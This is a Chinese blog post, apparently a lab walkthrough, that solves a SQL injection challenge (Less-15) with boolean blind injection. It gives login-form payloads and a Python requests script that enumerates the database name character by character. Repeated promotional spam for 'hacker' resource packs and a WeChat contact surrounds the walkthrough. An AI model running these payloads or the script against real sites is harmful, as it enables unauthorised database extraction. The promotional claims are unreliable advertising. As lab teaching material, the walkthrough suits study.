给大家的福利
零基础入门
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
因篇幅有限,仅展示部分资料
网络安全面试题
绿盟护网行动
还有大家最喜欢的黑客技术
网络安全源码合集+工具包
所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~
需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
二、思路分析
参数中添加引号,页面不显示数据库的报错信息,报错注入无法使用。
使用万能账号登录成功后,页面不会动态返回数据(返回写死的图片),无法使用联合注入。
登录成功和登录失败(或错误)对应两种不同的页面响应情况,可以使用报错注入。
三、解题步骤
方式一:布尔盲注
参考文章:布尔盲注使用详解,原理+步骤+实战教程
第一步、判断注入点
用户名输入:a’ or 1 – a
密码随便输入:1,页面正常显示(登录成功)
用户名输入:a’ or 0 – a
密码随便输入:1,页面异常显示(登录失败)
由此可以判断,网站存在注入,注入点为单引号字符型注入。
第二步、判断长度
判断当前使用数据库名字的长度,是否大于1,用户名输入:
a' or length(
(database())
) >1 -- a
长度肯定大于1,页面正常显示(登录成功),确定payload可用。
依次递增长度进行测试,手动判断效率太低,稍后使用脚本自动化猜解。
第三步、枚举字符
截取当前使用数据库名字的第一个字符,并转换为ASCLL(方便脚本测试)。
判断字符的ASCLL码是否大于1,用户名输入:
a' or ascii(
substr(
(database())
,1,1)
) >1 -- a
字符的ASCLL码肯定大于1,页面正常显示(登录成功),确定payload可用。
依次测试字符的ASCLL是否等于(32~126)。
测试成功后,再按照此方法测试其余字符,人工测试效率较低,稍后使用脚本自动化枚举。
脱库
Python自动化脚本如下,可按需修改:
import requests
# 网站路径
url = "http://c1f436ecda844ea09d8e3dc91476b913.app.mituan.zone/Less-15/"
# 判断长度的payload
payload_len = """a' or length(
(database())
) ={n} -- a"""
# 枚举字符的payload
payload_str = """a' or ascii(
substr(
(database())
,{l},1)
) ={n} -- a"""
# post请求参数
data= {
"uname" : "a') or 1 -- a",
"passwd" : "1",
"submit" : "Submit"
}
# 判断长度
def getLen(payload_len):
length = 1
while True:
# 修改请求参数
data["uname"] = payload_len.format(n = length)
response = requests.post(url=url, data=data)
# 出现此内容为登录成功
if '../images/flag.jpg' in response.text:
print('测试成功,长度为:', length)
return length;
else:
print('正在测试长度:', length)
length += 1
# 枚举字符
def getStr(length):
str = ''
# 从第一个字符开始截取
for l in range(1, length+1):
# 枚举字符的每一种可能性
for n in range(32, 126):
data["uname"] = payload_str.format(l=l, n=n)
response = requests.post(url=url, data=data)
if '../images/flag.jpg' in response.text:
str += chr(n)
print('第', l, '个字符枚举成功:',str )
break
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
***93道网络安全面试题***
**需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)**
内容实在太多,不一一截图了
### 黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
😝朋友们如果有需要的话,可以联系领取~
#### 1️⃣零基础入门
##### ① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
##### ② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
#### 2️⃣视频配套工具&国内外网安书籍、文档
##### ① 工具
##### ② 视频
##### ③ 书籍
资源较为敏感,未展示全面,需要的最下面获取
##### ② 简历模板
**因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆**
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
